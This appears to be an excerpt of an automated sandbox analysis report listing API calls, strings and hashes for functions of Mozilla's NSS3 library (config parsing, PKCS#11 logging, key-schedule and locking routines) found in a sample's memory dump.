Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
API String ID: 2065226673-2785624044
Opcode ID: 90efd8b34f20d3e86be7f42c6aeab1d4ae9fb6d522ef4a333751c4975b7c3305
Instruction ID: d7aa8caba7ed02f2fbd48fc2c210c889372a89226193d65f649611f0689e5987
Opcode Fuzzy Hash: 90efd8b34f20d3e86be7f42c6aeab1d4ae9fb6d522ef4a333751c4975b7c3305
Instruction Fuzzy Hash: F44182B1A40305ABE740DB75AC91B6F7BA89F4524CF180860E905E6B01FB35DA1886A6

Function 6C596CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C596910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C596943
Part of subcall function 6C596910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C596957
Part of subcall function 6C596910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C596972
Part of subcall function 6C596910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C596983
Part of subcall function 6C596910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C5969AA
Part of subcall function 6C596910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C5969BE
Part of subcall function 6C596910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C5969D2
Part of subcall function 6C596910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C5969DF
Part of subcall function 6C596910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C596A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C596D8C
free.MOZGLUE(00000000), ref: 6C596DC5
free.MOZGLUE(?), ref: 6C596DD6
free.MOZGLUE(?), ref: 6C596DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C596E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C596E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C596E72
free.MOZGLUE(?), ref: 6C596EA7
free.MOZGLUE(?), ref: 6C596EC4
free.MOZGLUE(?), ref: 6C596ED5
free.MOZGLUE(00000000), ref: 6C596EE3
free.MOZGLUE(?), ref: 6C596EF4
free.MOZGLUE(?), ref: 6C596F08
free.MOZGLUE(00000000), ref: 6C596F35
free.MOZGLUE(?), ref: 6C596F44
free.MOZGLUE(?), ref: 6C596F5B
free.MOZGLUE(00000000), ref: 6C596F65

Part of subcall function 6C596C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C59781D,00000000,6C58BE2C,?,6C596B1D,?,?,?,?,00000000,00000000,6C59781D), ref: 6C596C40
Part of subcall function 6C596C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C59781D,?,6C58BE2C,?), ref: 6C596C58
Part of subcall function 6C596C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C59781D), ref: 6C596C6F
Part of subcall function 6C596C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C596C84
Part of subcall function 6C596C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C596C96
Part of subcall function 6C596C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C596CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C596F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C596FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C596FF4

Strings

+`Zl, xrefs: 6C596D0D

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`Zl
API String ID: 1304971872-451978414
Opcode ID: 84b2740b2e11171c0cbda2b0220475b58ba9ab3cd1f6617064381d5f22f3b055
Instruction ID: 01bed9ee3829c723a44bd68dd9ae9a7f00e461a06ccebc8434b5175dd421f863
Opcode Fuzzy Hash: 84b2740b2e11171c0cbda2b0220475b58ba9ab3cd1f6617064381d5f22f3b055
Instruction Fuzzy Hash: 0FB151B4E013899FDF40DBA6DC84B9EBBB4AF05348F140165E815E7A40EB35E918CBE1

Function 6C58AF20 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C58AF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C58AF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C58AF83

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C58AF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C58AFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C58AFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C58AFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C58B00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C58B028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C58B041

Strings

ulParameterLen = 0x%p, xrefs: 6C58AFD4
pulSignatureLen = 0x%p, xrefs: 6C58B03C
(CK_INVALID_HANDLE), xrefs: 6C58AF7C
ulDataLen = %d, xrefs: 6C58B00A
hSession = 0x%x, xrefs: 6C58AF5E, 6C58AF6E
nfl, xrefs: 6C58B059, 6C58B093
pParameter = 0x%p, xrefs: 6C58AFB9
pSignature = 0x%p, xrefs: 6C58B023
pData = 0x%p, xrefs: 6C58AFEF
C_SignMessage, xrefs: 6C58AF41

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage$nfl
API String ID: 1003633598-413007221
Opcode ID: f04815f800349b8d5b93e1ea4d917c17a3bae5209e50d61e542acd42d549de13
Instruction ID: ce712f553f08b6cd1942a4bc4a0e04c58cd6d51657da559581a66c0a892a97b0
Opcode Fuzzy Hash: f04815f800349b8d5b93e1ea4d917c17a3bae5209e50d61e542acd42d549de13
Instruction Fuzzy Hash: 9941B675602154EFDB10DF55DD88F8A7BB6EB8230DF084424F6086BA51D7309868CFAE

Function 6C5808F0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 230COMMON

Download Yara Rule

APIs

htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C58094D
htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C580953
htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6C58096E
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6C580974
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C58098F
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C580995

Part of subcall function 6C581800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C581860
Part of subcall function 6C581800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C5809BF), ref: 6C581897
Part of subcall function 6C581800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C5818AA
Part of subcall function 6C581800: memcpy.VCRUNTIME140(?,?,?), ref: 6C5818C4

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C580B4F
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C580B5E
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C580B6B
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6C580B78

Strings

base_nonce, xrefs: 6C580B06
key, xrefs: 6C580ACB
info_hash, xrefs: 6C5809E0
secret, xrefs: 6C580A88
psk_id_hash, xrefs: 6C5809B5
exp, xrefs: 6C580B36

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
API String ID: 1637529542-763765719
Opcode ID: 2b9486b693ea6318a7edfb5cd17cff54920b3afcce53ff6f20ebed0aa0c9e689
Instruction ID: ef596ed6d700bc7860b5725452e69ca28b840c461cce70a519dca10932381530
Opcode Fuzzy Hash: 2b9486b693ea6318a7edfb5cd17cff54920b3afcce53ff6f20ebed0aa0c9e689
Instruction Fuzzy Hash: 8E818A75605301AFC700CF65CC80A9AF7E8EF8D608F048919FA9987751E731EA19CBA6

Function 6C592D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C592DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C592E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C592E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C592E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C564F1C,?,-00000001,00000000,?), ref: 6C592E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C564F1C,?,-00000001,00000000), ref: 6C592E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C592EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C592EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C592EF8
PR_Unlock.NSS3(?), ref: 6C592F62
TlsGetValue.KERNEL32 ref: 6C592F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C592F9E
PR_Unlock.NSS3(?), ref: 6C592FCA
TlsGetValue.KERNEL32 ref: 6C59301A
EnterCriticalSection.KERNEL32(?), ref: 6C59302E
PR_Unlock.NSS3(?), ref: 6C593066
PR_SetError.NSS3(00000000,00000000), ref: 6C593085
PR_Unlock.NSS3(?), ref: 6C5930EC
TlsGetValue.KERNEL32 ref: 6C59310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C593124
PR_Unlock.NSS3(?), ref: 6C59314C

Part of subcall function 6C579180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C5A379E,?,6C579568,00000000,?,6C5A379E,?,00000001,?), ref: 6C57918D
Part of subcall function 6C579180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C5A379E,?,6C579568,00000000,?,6C5A379E,?,00000001,?), ref: 6C5791A0

Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407AD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407CD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407D6
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4D204A), ref: 6C5407E4
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,6C4D204A), ref: 6C540864
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C540880
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,6C4D204A), ref: 6C5408CB
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408D7
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408FB

PR_SetError.NSS3(00000000,00000000), ref: 6C59316D

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 209b4310ed2c781b6ad6c902826f4269ed39f6817834615d2c47c320ac342746
Instruction ID: 7f73e99dec4503d3532d9bb05528707b09480cf3ab3239c9052d1de85e48ff34
Opcode Fuzzy Hash: 209b4310ed2c781b6ad6c902826f4269ed39f6817834615d2c47c320ac342746
Instruction Fuzzy Hash: A2F17BB1D00249EFDF00DF65DC84AAEBBB4BF09318F1445A9EC09A7721E731A995CB91

Function 6C588820 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptVerifyUpdate), ref: 6C588846
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C588874
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C588883

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C588899
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C5888BA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C5888D3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C5888EC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C588907
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C588979

Strings

pEncryptedPart = 0x%p, xrefs: 6C5888B5
C_DecryptVerifyUpdate, xrefs: 6C588841
pulPartLen = 0x%p, xrefs: 6C588902
(CK_INVALID_HANDLE), xrefs: 6C58887C
ulEncryptedPartLen = %d, xrefs: 6C5888CE
*pulPartLen = 0x%x, xrefs: 6C588974
hSession = 0x%x, xrefs: 6C58885E, 6C58886E
nfl, xrefs: 6C588921, 6C588955
pPart = 0x%p, xrefs: 6C5888E7

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptVerifyUpdate$nfl
API String ID: 1003633598-783185994
Opcode ID: 7bfaed7301bdcb5bb8091cd349d20150ea87afbd8c98997760d378d15f757282
Instruction ID: 28f8216b9f0ff7300cda0847a86cbcc422b7af3c7a1b9f8e30594af934223d05
Opcode Fuzzy Hash: 7bfaed7301bdcb5bb8091cd349d20150ea87afbd8c98997760d378d15f757282
Instruction Fuzzy Hash: 9341D675602154EFDB00CF56DD88B4A3BB2EB8231DF484465EA096BA51D7309928CFAF

Function 6C586D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C586D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C586DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C586DC3

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C586DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C586DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C586E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C586E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C586E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C586EB9

Strings

*pulDigestLen = 0x%x, xrefs: 6C586EB4
(CK_INVALID_HANDLE), xrefs: 6C586DBC
C_Digest, xrefs: 6C586D81
ulDataLen = %d, xrefs: 6C586E0E
hSession = 0x%x, xrefs: 6C586D9E, 6C586DAE
nfl, xrefs: 6C586E61, 6C586E95
pData = 0x%p, xrefs: 6C586DF5
pDigest = 0x%p, xrefs: 6C586E27
pulDigestLen = 0x%p, xrefs: 6C586E42

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nfl
API String ID: 1003633598-87243326
Opcode ID: 2ad0064eaf8d848e64e98d4b52ac71148a8f6809a277037108feb44bd55633a7
Instruction ID: e52563a44e2c5959ed95611c820f07ec609f34c758830dd6bde55aa7fc06d398
Opcode Fuzzy Hash: 2ad0064eaf8d848e64e98d4b52ac71148a8f6809a277037108feb44bd55633a7
Instruction Fuzzy Hash: 3B418675612154EFDB00DF56DD89B8B3BB2AB8231DF044424E509ABA11DF30D958CBAE

Function 6C586960 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptUpdate), ref: 6C586986
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5869B4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5869C3

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C5869D9
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C5869FA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C586A13
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C586A2C
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C586A47
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C586AB9

Strings

pEncryptedPart = 0x%p, xrefs: 6C5869F5
pulPartLen = 0x%p, xrefs: 6C586A42
(CK_INVALID_HANDLE), xrefs: 6C5869BC
ulEncryptedPartLen = %d, xrefs: 6C586A0E
C_DecryptUpdate, xrefs: 6C586981
*pulPartLen = 0x%x, xrefs: 6C586AB4
hSession = 0x%x, xrefs: 6C58699E, 6C5869AE
nfl, xrefs: 6C586A61, 6C586A95
pPart = 0x%p, xrefs: 6C586A27

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptUpdate$nfl
API String ID: 1003633598-1596476218
Opcode ID: 8df32966924d56d241d5deb93e7316567964ad2ee3b0b5518c3054ff51667afa
Instruction ID: 837b3849d925414e51561a350d10dcd98dbefde4ffe66a38b2984a9a633c243d
Opcode Fuzzy Hash: 8df32966924d56d241d5deb93e7316567964ad2ee3b0b5518c3054ff51667afa
Instruction Fuzzy Hash: BB41D775602114EFDB00CF56DD88A4A3BB1EB8231DF088424E509ABA51DF34DC68CBAE

Function 6C594C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C594C4C
EnterCriticalSection.KERNEL32(?), ref: 6C594C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C594CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C594CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C594CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C594D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C594D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C594DB7

Part of subcall function 6C5FDD70: TlsGetValue.KERNEL32 ref: 6C5FDD8C
Part of subcall function 6C5FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5FDDB4

Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407AD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407CD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407D6
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4D204A), ref: 6C5407E4
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,6C4D204A), ref: 6C540864
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C540880
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,6C4D204A), ref: 6C5408CB
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408D7
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408FB

TlsGetValue.KERNEL32 ref: 6C594DD7
EnterCriticalSection.KERNEL32(?), ref: 6C594DEC
PR_Unlock.NSS3(?), ref: 6C594E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C594E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C594E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C594E71
free.MOZGLUE(00000000), ref: 6C594E7A
PR_Unlock.NSS3(?), ref: 6C594EA2
TlsGetValue.KERNEL32 ref: 6C594EC1
EnterCriticalSection.KERNEL32(?), ref: 6C594ED6
PR_Unlock.NSS3(?), ref: 6C594F01
free.MOZGLUE(00000000), ref: 6C594F2A

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
